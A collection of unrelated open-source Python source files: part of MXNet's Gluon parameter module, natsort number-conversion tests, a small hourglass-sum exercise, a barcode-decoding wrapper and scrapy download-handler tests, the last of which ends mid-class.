all(j == 0 or i == j for i, j in zip(new_shape, self._shape)), \
"Expected shape %s is incompatible with given shape %s."%(
str(new_shape), str(self._shape))
self._shape = new_shape
def _check_and_get(self, arr_list, ctx):
if arr_list is not None:
if ctx is list:
return arr_list
if ctx is None:
if len(arr_list) == 1:
return arr_list[0]
else:
ctx = context.current_context()
ctx_list = self._ctx_map[ctx.device_typeid&1]
if ctx.device_id < len(ctx_list):
idx = ctx_list[ctx.device_id]
if idx is not None:
return arr_list[idx]
raise RuntimeError(
"Parameter '%s' was not initialized on context %s. "
"It was only initialized on %s."%(
self.name, str(ctx), str(self._ctx_list)))
if self._deferred_init:
raise DeferredInitializationError(
"Parameter '%s' has not been initialized yet because initialization was " \
"deferred. Actual initialization happens during the first forward pass. " \
"Please pass one batch of data through the network before accessing Parameters. " \
"You can also avoid deferred initialization by specifying in_units, " \
"num_features, etc., for network layers."%(self.name))
raise RuntimeError(
"Parameter '%s' has not been initialized. Note that " \
"you should initialize parameters and create Trainer " \
"with Block.collect_params() instead of Block.params " \
"because the later does not include Parameters of " \
"nested child Blocks"%(self.name))
def _load_init(self, data, ctx):
"""(Re)initializes by loading from data."""
if self.shape:
for self_dim, data_dim in zip(self.shape, data.shape):
assert self_dim == 0 or self_dim == data_dim, \
"Failed loading Parameter '%s' from saved params: " \
"shape incompatible expected %s vs saved %s"%(
self.name, str(self.shape), str(data.shape))
self.shape = tuple(i if i != 0 else j for i, j in zip(self.shape, data.shape))
if self.dtype:
assert np.dtype(self.dtype).type == data.dtype, \
"Failed loading Parameter '%s' from saved params: " \
"dtype incompatible expected %s vs saved %s"%(
self.name, str(self.dtype), str(data.dtype))
if isinstance(ctx, Context):
ctx = [ctx]
if self._data is None:
if self._deferred_init:
assert ctx is None or set(ctx) == set(self._deferred_init[1]), \
"Failed to load Parameter '%s' on %s because it was " \
"previous initialized on %s."%(
self.name, str(ctx), str(self.list_ctx()))
ctx = self._deferred_init[1]
elif ctx is None:
ctx = [cpu()]
self._init_impl(data, ctx)
else:
assert ctx is None or set(ctx) == set(self.list_ctx()), \
"Failed to load Parameter '%s' on %s because it was " \
"previous initialized on %s."%(
self.name, str(ctx), str(self.list_ctx()))
self.set_data(data)
self._deferred_init = ()
def _finish_deferred_init(self):
"""Finishes deferred initialization."""
if not self._deferred_init:
return
init, ctx, default_init, data = self._deferred_init
self._deferred_init = ()
assert self.shape is not None and np.prod(self.shape) > 0, \
"Cannot initialize Parameter '%s' because it has " \
"invalid shape: %s. Please specify in_units, " \
"in_channels, etc for `Block`s."%(
self.name, str(self.shape))
with autograd.pause():
if data is None:
data = ndarray.zeros(shape=self.shape, dtype=self.dtype,
ctx=context.cpu())
initializer.create(default_init)(
initializer.InitDesc(self.name, {'__init__': init}), data)
self._init_impl(data, ctx)
def _init_impl(self, data, ctx_list):
"""Sets data and grad."""
self._ctx_list = list(ctx_list)
self._ctx_map = [[], []]
for i, ctx in enumerate(self._ctx_list):
dev_list = self._ctx_map[ctx.device_typeid&1]
while len(dev_list) <= ctx.device_id:
dev_list.append(None)
dev_list[ctx.device_id] = i
self._data = [data.copyto(ctx) for ctx in self._ctx_list]
self._init_grad()
def _init_grad(self):
"""Initialize grad buffers."""
if self.grad_req == 'null':
self._grad = None
return
self._grad = [ndarray.zeros_like(i) for i in self._data]
autograd.mark_variables(self.list_data(), self.list_grad(), self.grad_req)
def _reduce(self):
"""Reduce data from multiple context."""
block = self.list_data()
data = ndarray.add_n(*(w.copyto(context.cpu()) for w in block)) / len(block)
return data
def initialize(self, init=None, ctx=None, default_init=initializer.Uniform(),
force_reinit=False):
"""Initializes parameter and gradient arrays. Only used for :py:class:`NDArray` API.
Parameters
----------
init : Initializer
The initializer to use. Overrides :py:meth:`Parameter.init` and default_init.
ctx : Context or list of Context, defaults to :py:meth:`context.current_context()`.
Initialize Parameter on given context. If ctx is a list of Context, a
copy will be made for each context.
.. note::
Copies are independent arrays. User is responsible for keeping
their values consistent when updating.
Normally :py:class:`gluon.Trainer` does this for you.
default_init : Initializer
Default initializer is used when both :py:func:`init`
and :py:meth:`Parameter.init` are ``None``.
force_reinit : bool, default False
Whether to force re-initialization if parameter is already initialized.
Examples
--------
>>> weight = mx.gluon.Parameter('weight', shape=(2, 2))
>>> weight.initialize(ctx=mx.cpu(0))
>>> weight.data()
[[-0.01068833 0.01729892]
[ 0.02042518 -0.01618656]]
<NDArray 2x2 @cpu(0)>
>>> weight.grad()
[[ 0. 0.]
[ 0. 0.]]
<NDArray 2x2 @cpu(0)>
>>> weight.initialize(ctx=[mx.gpu(0), mx.gpu(1)])
>>> weight.data(mx.gpu(0))
[[-0.00873779 -0.02834515]
[ 0.05484822 -0.06206018]]
<NDArray 2x2 @gpu(0)>
>>> weight.data(mx.gpu(1))
[[-0.00873779 -0.02834515]
[ 0.05484822 -0.06206018]]
<NDArray 2x2 @gpu(1)>
"""
if self._data is not None and not force_reinit:
warnings.warn("Parameter '%s' is already initialized, ignoring. " \
"Set force_reinit=True to re-initialize."%self.name,
stacklevel=2)
return
self._data = self._grad = None
if ctx is None:
ctx = [context.current_context()]
if isinstance(ctx, Context):
ctx = [ctx]
if init is None:
init = default_init if self.init is None else self.init
if not self.shape or np.prod(self.shape) <= 0:
if self._allow_deferred_init:
self._deferred_init = (init, ctx, default_init, None)
return
raise ValueError("Cannot initialize Parameter '%s' because it has " \
"invalid shape: %s."%(self.name, str(self.shape)))
self._deferred_init = (init, ctx, default_init, None)
self._finish_deferred_init()
def reset_ctx(self, ctx):
"""Re-assign Parameter to other contexts.
ctx : Context or list of Context, default ``context.current_context()``.
Assign Parameter to given context. If ctx is a list of Context, a
copy will be made for each context.
"""
if ctx is None:
ctx = [context.current_context()]
if isinstance(ctx, Context):
ctx = [ctx]
if self._data:
data = self._reduce()
with autograd.pause():
self._init_impl(data, ctx)
elif self._deferred_init:
init, _, default_init, data = self._deferred_init
self._deferred_init = (init, ctx, default_init, data)
else:
raise ValueError("Cannot reset context for Parameter '%s' because it "
"has not been initialized."%self.name)
def set_data(self, data):
"""Sets this parameter's value on all contexts."""
self.shape = data.shape
if self._data is None:
assert self._deferred_init is not None, \
"Parameter '%s' has not been initialized"%self.name
self._deferred_init = self._deferred_init[:3] + (data,)
return
for arr in self.list_data():
arr[:] = data
def data(self, ctx=None):
"""Returns a copy of this parameter on one context. Must have been
initialized on this context before.
Parameters
----------
ctx : Context
Desired context.
Returns
-------
NDArray on ctx
"""
return self._check_and_get(self._data, ctx)
def list_data(self):
"""Returns copies of this parameter on all contexts, in the same order
as creation."""
return self._check_and_get(self._data, list)
def grad(self, ctx=None):
"""Returns a gradient buffer for this parameter on one context.
Parameters
----------
ctx : Context
Desired context.
"""
if self._data is not None and self._grad is None:
raise RuntimeError(
"Cannot get gradient array for Parameter '%s' " \
"because grad_req='null'"%(self.name))
return self._check_and_get(self._grad, ctx)
def list_grad(self):
"""Returns gradient buffers on all contexts, in the same order
as :py:meth:`values`."""
if self._data is not None and self._grad is None:
raise RuntimeError(
"Cannot get gradient array for Parameter '%s' " \
"because grad_req='null'"%(self.name))
return self._check_and_get(self._grad, list)
def list_ctx(self):
"""Returns a list of contexts this parameter is initialized on."""
if self._data is None:
if self._deferred_init:
return self._deferred_init[1]
raise RuntimeError("Parameter '%s' has not been initialized"%self.name)
return self._ctx_list
def zero_grad(self):
"""Sets gradient buffer on all contexts to 0. No action is taken if
parameter is uninitialized or doesn't require gradient."""
if self._grad is None:
return
for i in self._grad:
i[:] = 0
def var(self):
"""Returns a symbol representing this parameter."""
if self._var is None:
self._var = symbol.var(self.name, shape=self.shape, dtype=self.dtype,
lr_mult=self.lr_mult, wd_mult=self.wd_mult,
init=self.init)
return self._var
def cast(self, dtype):
"""Cast data and gradient of this Parameter to a new data type.
Parameters
----------
dtype : str or numpy.dtype
The new data type.
"""
self.dtype = dtype
if self._data is None:
return
with autograd.pause():
self._data = [i.astype(dtype) for i in self._data]
if self._grad is None:
return
self._grad = [i.astype(dtype) for i in self._grad]
autograd.mark_variables(self._data, self._grad, self.grad_req)
class Constant(Parameter):
"""A constant parameter for holding immutable tensors.
`Constant`s are ignored by `autograd` and `Trainer`, thus their values
will not change during training. But you can still update their values
manually with the `set_data` method.
`Constant`s can be created with either::
const = mx.gluon.Constant('const', [[1,2],[3,4]])
or::
class Block(gluon.Block):
def __init__(self, **kwargs):
super(Block, self).__init__(**kwargs)
self.const = self.params.get_constant('const', [[1,2],[3,4]])
Parameter
---------
name : str
Name of the parameter.
value : array-like
Initial value for the constant.
"""
def __init__(self, name, value):
if not isinstance(value, ndarray.NDArray):
value = ndarray.array(value)
self.value = value
class Init(initializer.Initializer):
def _init_weight(self, _, arr):
value.copyto(arr)
init_name = 'Constant_{}_{}'.format(name, id(self))
initializer.alias(init_name)(Init)
super(Constant, self).__init__(
name, grad_req='null', shape=value.shape, dtype=value.dtype,
init=init_name)
def __repr__(self):
s = 'Constant {name} (shape={shape}, dtype={dtype})'
return s.format(name=self.name, shape=self.shape, dtype=self.dtype)
class ParameterDict(object):
"""A dictionary managing a set of parameters.
Parameters
----------
prefix : str, default ``''``
The prefix to be prepended to all Parameters' names created by this dict.
shared : ParameterDict or None
If not ``None``, when this dict's :py:meth:`get` method creates a new parameter, will
first try to retrieve it from "shared" dict. Usually used for sharing
parameters with another Block.
"""
def __init__(self, prefix='', shared=None):
self._prefix = prefix
self._params = OrderedDict()
self._shared = shared
def __repr__(self):
s = '{name}(\n{content}\n)'
name = self._prefix+' ' if self._prefix else ''
return s.format(name=name,
content='\n'.join([_indent(' {0}'.format(v), 2)
for v in self.values()]))
def __getitem__(self, key):
return self._params[key]
def __iter__(self):
return iter(self._params)
def items(self):
return self._params.items()
def keys(self):
return self._params.keys()
def values(self):
return self._params.values()
@property
def prefix(self):
"""Prefix of this dict. It will be prepended to :py:class:`Parameter`s' name created
with :py:func:`get`."""
return self._prefix
def _get_impl(self, name):
if name in self._params:
return self._params[name]
if self._shared is not None and name in self._shared._params:
self._params[name] = self._shared._params[name]
return self._shared._params[name]
return None
def get(self, name, **kwargs):
"""Retrieves a :py:class:`Parameter` with name ``self.prefix+name``. If not found,
:py:func:`get` will first try to retrieve it from "shared" dict. If still not
found, :py:func:`get` will create a new :py:class:`Parameter` with key-word arguments and
insert it to self.
Parameters
----------
name : str
Name of the desired Parameter. It will be prepended with this dictionary's
prefix.
**kwargs : dict
The rest of key-word arguments for the created :py:class:`Parameter`.
Returns
-------
Parameter
The created or retrieved :py:class:`Parameter`.
"""
name = self.prefix + name
param = self._get_impl(name)
if param is None: # pylint: disable=too-many-nested-blocks
param = Parameter(name, **kwargs)
self._params[name] = param
else:
for k, v in kwargs.items():
if hasattr(param, k) and getattr(param, k) is not None:
existing = getattr(param, k)
if k == 'shape' and len(v) == len(existing):
inferred_shape = []
matched = True
for dim1, dim2 in zip(v, existing):
if dim1 != dim2 and dim1 * dim2 != 0:
matched = False
break
elif dim1 == dim2:
inferred_shape.append(dim1)
elif dim1 == 0:
inferred_shape.append(dim2)
else:
inferred_shape.append(dim1)
if matched:
param._shape = tuple(inferred_shape)
continue
assert v is None or v == existing, \
"Cannot retrieve Parameter '%s' because desired attribute " \
"does not match with stored for attribute '%s': " \
"desired '%s' vs stored '%s'."%(
name, k, str(v), str(getattr(param, k)))
else:
setattr(param, k, v)
return param
def get_constant(self, name, value=None):
"""Retrieves a :py:class:`Constant` with name ``self.prefix+name``. If not found,
:py:func:`get` will first try to retrieve it from "shared" dict. If still not
found, :py:func:`get` will create a new :py:class:`Constant` with key-word
arguments and insert it to self.
Constants
----------
name : str
Name of the desired Constant. It will be prepended with this dictionary's
prefix.
value : array-like
Initial value of constant.
Returns
-------
Constant
The created or retrieved :py:class:`Constant`.
"""
name = self.prefix + name
param = self._get_impl(name)
if param is None:
if value is None:
raise KeyError("No constant named '{}'. Please specify value " \
"if you want to create a new constant.".format(
name))
param = Constant(name, value)
self._params[name] = param
elif value is not None:
assert isinstance(param, Constant), \
"Parameter '{}' already exists but it is not a constant.".format(
name)
if isinstance(value, ndarray.NDArray):
value = value.asnumpy()
assert param.shape == value.shape and \
(param.value.asnumpy() == value).all(), \
"Constant '{}' already exists but it's value doesn't match new " \
"value".format(name)
return param
def update(self, other):
"""Copies all Parameters in ``other`` to self."""
for k, v in other.items():
if k in self._params:
assert self._params[k] is v, \
"Cannot update self with other because they have different " \
"Parameters with the same name '%s'"%k
for k, v in other.items():
self._params[k] = v
def initialize(self, init=initializer.Uniform(), ctx=None, verbose=False,
force_reinit=False):
"""Initializes all Parameters managed by this dictionary to be used for :py:class:`NDArray`
API. It has no effect when using :py:class:`Symbol` API.
Parameters
----------
init : Initializer
Global default Initializer to be used when :py:meth:`Parameter.init` is ``None``.
Otherwise, :py:meth:`Parameter.init` takes precedence.
ctx : Context or list of Context
Keeps a copy of Parameters on one or many context(s).
verbose : bool, default False
Whether to verbosely print out details on initialization.
force_reinit : bool, default False
Whether to force re-initialization if parameter is already initialized.
"""
if verbose:
init.set_verbosity(verbose=verbose)
for _, v in self.items():
v.initialize(None, ctx, init, force_reinit=force_reinit)
def zero_grad(self):
"""Sets all Parameters' gradient buffer to 0."""
for i in self.values():
i.zero_grad()
def reset_ctx(self, ctx):
"""Re-assign all Parameters to other contexts.
ctx : Context or list of Context, default :py:meth:`context.current_context()`.
Assign Parameter to given context. If ctx is a list of Context, a
copy will be made for each context.
"""
for i in self.values():
i.reset_ctx(ctx)
def setattr(self, name, value):
"""Set an attribute to a new value for all Parameters.
For example, set grad_req to null if you don't need gradient w.r.t a
model's Parameters::
model.collect_params().setattr('grad_req', 'null')
or change the learning rate multiplier::
model.collect_params().setattr('lr_mult', 0.5)
Parameters
----------
name : str
Name of the attribute.
value : valid type for attribute name
The new value for the attribute.
"""
for i in self.values():
setattr(i, name, value)
def save(self, filename, strip_prefix=''):
"""Save parameters to file.
filename : str
Path to parameter file.
strip_prefix : str, default ''
Strip prefix from parameter names before saving.
"""
arg_dict = {}
for param in self.values():
weight = param._reduce()
if not param.name.startswith(strip_prefix):
raise ValueError(
"Prefix '%s' is to be striped before saving, but Parameter's "
"name '%s' does not start with '%s'. "
"this may be due to your Block shares parameters from other "
"Blocks or you forgot to use 'with name_scope()' when creating "
"child blocks. For more info on naming, please see "
"http://mxnet.incubator.apache.org/tutorials/basic/naming.html"%(
strip_prefix, param.name, strip_prefix))
arg_dict[param.name[len(strip_prefix):]] = weight
ndarray.save(filename, arg_dict)
def load(self, filename, ctx=None, allow_missing=False,
ignore_extra=False, restore_prefix=''):
"""Load parameters from file.
filename : str
Path to parameter file.
ctx : Context or list of Context
Context(s) initialize loaded parameters on.
allow_missing : bool, default False
Whether to silently skip loading parameters not represents in the file.
ignore_extra : bool, default False
Whether to silently ignore parameters from the file that are not
present in this ParameterDict.
restore_prefix : str, default ''
prepend prefix to names of stored parameters before loading.
"""
if restore_prefix:
for name in self.keys():
assert name.startswith(restore_prefix), \
"restore_prefix is '%s' but Parameters name '%s' does not start " \
"with '%s'"%(restore_prefix, name, restore_prefix)
lprefix = len(restore_prefix)
loaded = [(k[4:] if k.startswith('arg:') or k.startswith('aux:') else k, v) \
for k, v in ndarray.load(filename).items()]
arg_dict = {restore_prefix+k: v for k, v in loaded}
if not allow_missing:
for name in self.keys():
assert name in arg_dict, \
"Parameter '%s' is missing in file '%s', which contains parameters: %s. " \
"Please make sure source and target networks have the same prefix."%(
name[lprefix:], filename, _brief_print_list(arg_dict.keys()))
for name in arg_dict:
if name not in self._params:
assert ignore_extra, \
"Parameter '%s' loaded from file '%s' is not present in ParameterDict, " \
"choices are: %s. Set ignore_extra to True to ignore. " \
"Please make sure source and target networks have the same prefix."%(
name[lprefix:], filename, _brief_print_list(self._params.keys()))
continue
self[name]._load_init(arg_dict[name], ctx)
| fullfanta/mxnet | python/mxnet/gluon/parameter.py | Python | apache-2.0 | 31,399 |
# -*- coding: utf-8 -*-
"""\
Test the fake fastnumbers module.
"""
import unicodedata
from math import isnan
from typing import Union, cast
from hypothesis import given
from hypothesis.strategies import floats, integers, text
from natsort.compat.fake_fastnumbers import fast_float, fast_int
def is_float(x: str) -> bool:
try:
float(x)
except ValueError:
try:
unicodedata.numeric(x)
except (ValueError, TypeError):
return False
else:
return True
else:
return True
def not_a_float(x: str) -> bool:
return not is_float(x)
def is_int(x: Union[str, float]) -> bool:
try:
return cast(float, x).is_integer()
except AttributeError:
try:
int(x)
except ValueError:
try:
unicodedata.digit(cast(str, x))
except (ValueError, TypeError):
return False
else:
return True
else:
return True
def not_an_int(x: Union[str, float]) -> bool:
return not is_int(x)
# Each test has an "example" version for demonstrative purposes,
# and a test that uses the hypothesis module.
def test_fast_float_returns_nan_alternate_if_nan_option_is_given() -> None:
assert fast_float("nan", nan=7) == 7
def test_fast_float_converts_float_string_to_float_example() -> None:
assert fast_float("45.8") == 45.8
assert fast_float("-45") == -45.0
assert fast_float("45.8e-2", key=len) == 45.8e-2
assert isnan(cast(float, fast_float("nan")))
assert isnan(cast(float, fast_float("+nan")))
assert isnan(cast(float, fast_float("-NaN")))
assert fast_float("۱۲.۱۲") == 12.12
assert fast_float("-۱۲.۱۲") == -12.12
@given(floats(allow_nan=False))
def test_fast_float_converts_float_string_to_float(x: float) -> None:
assert fast_float(repr(x)) == x
def test_fast_float_leaves_string_as_is_example() -> None:
assert fast_float("invalid") == "invalid"
@given(text().filter(not_a_float).filter(bool))
def test_fast_float_leaves_string_as_is(x: str) -> None:
assert fast_float(x) == x
def test_fast_float_with_key_applies_to_string_example() -> None:
assert fast_float("invalid", key=len) == len("invalid")
@given(text().filter(not_a_float).filter(bool))
def test_fast_float_with_key_applies_to_string(x: str) -> None:
assert fast_float(x, key=len) == len(x)
def test_fast_int_leaves_float_string_as_is_example() -> None:
assert fast_int("45.8") == "45.8"
assert fast_int("nan") == "nan"
assert fast_int("inf") == "inf"
@given(floats().filter(not_an_int))
def test_fast_int_leaves_float_string_as_is(x: float) -> None:
assert fast_int(repr(x)) == repr(x)
def test_fast_int_converts_int_string_to_int_example() -> None:
assert fast_int("-45") == -45
assert fast_int("+45") == 45
assert fast_int("۱۲") == 12
assert fast_int("-۱۲") == -12
@given(integers())
def test_fast_int_converts_int_string_to_int(x: int) -> None:
assert fast_int(repr(x)) == x
def test_fast_int_leaves_string_as_is_example() -> None:
assert fast_int("invalid") == "invalid"
@given(text().filter(not_an_int).filter(bool))
def test_fast_int_leaves_string_as_is(x: str) -> None:
assert fast_int(x) == x
def test_fast_int_with_key_applies_to_string_example() -> None:
assert fast_int("invalid", key=len) == len("invalid")
@given(text().filter(not_an_int).filter(bool))
def test_fast_int_with_key_applies_to_string(x: str) -> None:
assert fast_int(x, key=len) == len(x)
| SethMMorton/natsort | tests/test_fake_fastnumbers.py | Python | mit | 3,584 |
#!/bin/python3
arr = []
for arr_i in range(6):
arr_t = [int(arr_temp) for arr_temp in input().strip().split(' ')]
arr.append(arr_t)
def hourglass_sum(i, j):
return arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][j + 1] + arr[i][j] + arr[i + 1][j - 1] + arr[i + 1][j] + \
arr[i + 1][j + 1]
max_sum = -100
for i in range(1, 5):
for j in range(1, 5):
sum = hourglass_sum(i, j)
if sum > max_sum:
max_sum = sum
print(max_sum)
| benosment/daily-exercises | hr-2d.py | Python | gpl-2.0 | 482 |
import os
import tempfile
import cv2
try:
from win32com import client as com
from win32com.client import constants as c
except ImportError:
com = c = None
from gouda.barcode import Barcode
from gouda.gouda_error import GoudaError
from gouda.util import debug_print, is_clsid_registered
class DTKEngine(object):
"""Decode using the DTK Barcode Reader SDK
DTK can decode many types of barcodes - currently using it just for
Data Matrix
"""
CLSID = "DTKBarReader.BarcodeReader"
def __init__(self, datamatrix):
if not self.available():
raise GoudaError('DTK unavailable')
else:
com.pythoncom.CoInitialize()
# Tip from stackoverflow about how to access COM constants
# http://stackoverflow.com/a/21534997/1773758
self.d = com.gencache.EnsureDispatch(self.CLSID)
if datamatrix:
self.d.BarcodeTypes = c.BT_DataMatrix
else:
self.d.BarcodeTypes = c.BT_Code128 | c.BT_Code39
# Map values in EBarcodeType to text
# This would ideally be a class member but the enumeration
# is visible only after the call to EnsureDispatch.
self.types = { c.BT_AustraliaPost : 'Australia Post',
c.BT_Codabar : 'Codabar',
c.BT_Code11 : 'Code 11',
c.BT_Code128 : 'Code 128',
c.BT_Code39 : 'Code 39',
c.BT_Code39Extended : 'Code 39 Extended',
c.BT_Code93 : 'Code 93',
c.BT_DataMatrix : 'Data Matrix',
c.BT_EAN13 : 'EAN-13',
c.BT_EAN8 : 'EAN-8',
c.BT_IntelligentMail : 'Intelligent Mail',
c.BT_Inter2of5 : 'Interleaved 2 of 5',
c.BT_MicroQRCode : 'Micro QR Code',
c.BT_PatchCode : 'Patch code',
c.BT_PDF417 : 'PDF 417',
c.BT_PharmaCode : 'Pharma Code',
c.BT_Planet : 'Planet',
c.BT_Plus2 : 'Plus 2',
c.BT_Plus5 : 'Plus 5',
c.BT_Postnet : 'Postnet',
c.BT_QRCode : 'QR Code',
c.BT_RM4SCC : 'RM 4 SCC',
c.BT_RSS14 : 'RSS 14',
c.BT_RSSExpanded : 'RSS Expanded',
c.BT_RSSLimited : 'RSS Limited',
c.BT_UCC128 : 'UCC 128',
c.BT_Unknown : 'Unknown',
c.BT_UPCA : 'UPCA',
c.BT_UPCE : 'UPCE',
}
@classmethod
def available(cls):
return com is not None and is_clsid_registered(cls.CLSID)
def decode_file(self, path):
self.d.ReadFromFile(str(path))
barcodes = [None] * self.d.Barcodes.Count
for i in xrange(0, self.d.Barcodes.Count):
b = self.d.Barcodes.Item(i)
barcodes[i] = Barcode(self.types.get(b.Type, 'Unknown'),
b.BarcodeString)
return barcodes
def __call__(self, img):
# Temporary files on Windows are pain
img_temp = tempfile.NamedTemporaryFile(suffix='.png', delete=False)
try:
debug_print('Writing temp file [{0}] for DTK'.format(img_temp.name))
cv2.imwrite(img_temp.name, img)
return self.decode_file(img_temp.name)
finally:
# TODO LH Logic here?
img_temp.close()
os.unlink(img_temp.name)
| koceg/gouda | gouda/engines/dtk.py | Python | gpl-2.0 | 3,651 |
import os
import twisted
from twisted.trial import unittest
from twisted.protocols.policies import WrappingFactory
from twisted.python.filepath import FilePath
from twisted.internet import reactor, defer, error
from twisted.web import server, static, util, resource
from twisted.web.test.test_webclient import ForeverTakingResource, \
NoLengthResource, HostHeaderResource, \
PayloadResource, BrokenDownloadResource
from twisted.protocols.ftp import FTPRealm, FTPFactory
from twisted.cred import portal, checkers, credentials
from twisted.protocols.ftp import FTPClient, ConnectionLost
from w3lib.url import path_to_file_uri
from scrapy import twisted_version
from scrapy.core.downloader.handlers import DownloadHandlers
from scrapy.core.downloader.handlers.file import FileDownloadHandler
from scrapy.core.downloader.handlers.http import HTTPDownloadHandler, HttpDownloadHandler
from scrapy.core.downloader.handlers.http10 import HTTP10DownloadHandler
from scrapy.core.downloader.handlers.http11 import HTTP11DownloadHandler
from scrapy.core.downloader.handlers.s3 import S3DownloadHandler
from scrapy.core.downloader.handlers.ftp import FTPDownloadHandler
from scrapy.spider import Spider
from scrapy.http import Request
from scrapy.settings import Settings
from scrapy import optional_features
from scrapy.utils.test import get_crawler
from scrapy.exceptions import NotConfigured
class DummyDH(object):
def __init__(self, crawler):
pass
class OffDH(object):
def __init__(self, crawler):
raise NotConfigured
class LoadTestCase(unittest.TestCase):
def test_enabled_handler(self):
handlers = {'scheme': 'tests.test_downloader_handlers.DummyDH'}
crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
dh = DownloadHandlers(crawler)
self.assertIn('scheme', dh._handlers)
self.assertNotIn('scheme', dh._notconfigured)
def test_not_configured_handler(self):
handlers = {'scheme': 'tests.test_downloader_handlers.OffDH'}
crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
dh = DownloadHandlers(crawler)
self.assertNotIn('scheme', dh._handlers)
self.assertIn('scheme', dh._notconfigured)
def test_disabled_handler(self):
handlers = {'scheme': None}
crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
dh = DownloadHandlers(crawler)
self.assertNotIn('scheme', dh._handlers)
self.assertNotIn('scheme', dh._notconfigured)
class FileTestCase(unittest.TestCase):
def setUp(self):
self.tmpname = self.mktemp()
fd = open(self.tmpname + '^', 'w')
fd.write('0123456789')
fd.close()
self.download_request = FileDownloadHandler(Settings()).download_request
def test_download(self):
def _test(response):
self.assertEquals(response.url, request.url)
self.assertEquals(response.status, 200)
self.assertEquals(response.body, '0123456789')
request = Request(path_to_file_uri(self.tmpname + '^'))
assert request.url.upper().endswith('%5E')
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_non_existent(self):
request = Request('file://%s' % self.mktemp())
d = self.download_request(request, Spider('foo'))
return self.assertFailure(d, IOError)
class HttpTestCase(unittest.TestCase):
download_handler_cls = HTTPDownloadHandler
def setUp(self):
name = self.mktemp()
os.mkdir(name)
FilePath(name).child("file").setContent("0123456789")
r = static.File(name)
r.putChild("redirect", util.Redirect("/file"))
r.putChild("wait", ForeverTakingResource())
r.putChild("hang-after-headers", ForeverTakingResource(write=True))
r.putChild("nolength", NoLengthResource())
r.putChild("host", HostHeaderResource())
r.putChild("payload", PayloadResource())
r.putChild("broken", BrokenDownloadResource())
self.site = server.Site(r, timeout=None)
self.wrapper = WrappingFactory(self.site)
self.port = reactor.listenTCP(0, self.wrapper, interface='127.0.0.1')
self.portno = self.port.getHost().port
self.download_handler = self.download_handler_cls(Settings())
self.download_request = self.download_handler.download_request
@defer.inlineCallbacks
def tearDown(self):
yield self.port.stopListening()
if hasattr(self.download_handler, 'close'):
yield self.download_handler.close()
def getURL(self, path):
return "http://127.0.0.1:%d/%s" % (self.portno, path)
def test_download(self):
request = Request(self.getURL('file'))
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, "0123456789")
return d
def test_download_head(self):
request = Request(self.getURL('file'), method='HEAD')
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, '')
return d
def test_redirect_status(self):
request = Request(self.getURL('redirect'))
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.status)
d.addCallback(self.assertEquals, 302)
return d
def test_redirect_status_head(self):
request = Request(self.getURL('redirect'), method='HEAD')
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.status)
d.addCallback(self.assertEquals, 302)
return d
@defer.inlineCallbacks
def test_timeout_download_from_spider(self):
spider = Spider('foo')
meta = {'download_timeout': 0.2}
# client connects but no data is received
request = Request(self.getURL('wait'), meta=meta)
d = self.download_request(request, spider)
yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)
# client connects, server send headers and some body bytes but hangs
request = Request(self.getURL('hang-after-headers'), meta=meta)
d = self.download_request(request, spider)
yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)
def test_host_header_not_in_request_headers(self):
def _test(response):
self.assertEquals(response.body, '127.0.0.1:%d' % self.portno)
self.assertEquals(request.headers, {})
request = Request(self.getURL('host'))
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_host_header_seted_in_request_headers(self):
def _test(response):
self.assertEquals(response.body, 'example.com')
self.assertEquals(request.headers.get('Host'), 'example.com')
request = Request(self.getURL('host'), headers={'Host': 'example.com'})
return self.download_request(request, Spider('foo')).addCallback(_test)
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, 'example.com')
return d
def test_payload(self):
body = '1'*100 # PayloadResource requires body length to be 100
request = Request(self.getURL('payload'), method='POST', body=body)
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, body)
return d
class DeprecatedHttpTestCase(HttpTestCase):
"""HTTP 1.0 test case"""
download_handler_cls = HttpDownloadHandler
class Http10TestCase(HttpTestCase):
"""HTTP 1.0 test case"""
download_handler_cls = HTTP10DownloadHandler
class Http11TestCase(HttpTestCase):
"""HTTP 1.1 test case"""
download_handler_cls = HTTP11DownloadHandler
if 'http11' not in optional_features:
skip = 'HTTP1.1 not supported in twisted < 11.1.0'
class UriResource(resource.Resource):
"""Return the full uri that was requested"""
def getChild(self, path, request):
return self
def render(self, request):
return request.uri
class HttpProxyTestCase(unittest.TestCase):
download_handler_cls = HTTPDownloadHandler
def setUp(self):
site = server.Site(UriResource(), timeout=None)
wrapper = WrappingFactory(site)
self.port = reactor.listenTCP(0, wrapper, interface='127.0.0.1')
self.portno = self.port.getHost().port
self.download_handler = self.download_handler_cls(Settings())
self.download_request = self.download_handler.download_request
@defer.inlineCallbacks
def tearDown(self):
yield self.port.stopListening()
if hasattr(self.download_handler, 'close'):
yield self.download_handler.close()
def getURL(self, path):
return "http://127.0.0.1:%d/%s" % (self.portno, path)
def test_download_with_proxy(self):
def _test(response):
self.assertEquals(response.status, 200)
self.assertEquals(response.url, request.url)
self.assertEquals(response.body, 'http://example.com')
http_proxy = self.getURL('')
request = Request('http://example.com', meta={'proxy': http_proxy})
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_download_with_proxy_https_noconnect(self):
def _test(response):
self.assertEquals(response.status, 200)
self.assertEquals(response.url, request.url)
self.assertEquals(response.body, 'https://example.com')
http_proxy = '%s?noconnect' % self.getURL('')
request = Request('https://example.com', meta={'proxy': http_proxy})
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_download_without_proxy(self):
def _test(response):
self.assertEquals(response.status, 200)
self.assertEquals(response.url, request.url)
self.assertEquals(response.body, '/path/to/resource')
request = Request(self.getURL('path/to/resource'))
return self.download_request(request, Spider('foo')).addCallback(_test)
class DeprecatedHttpProxyTestCase(unittest.TestCase):
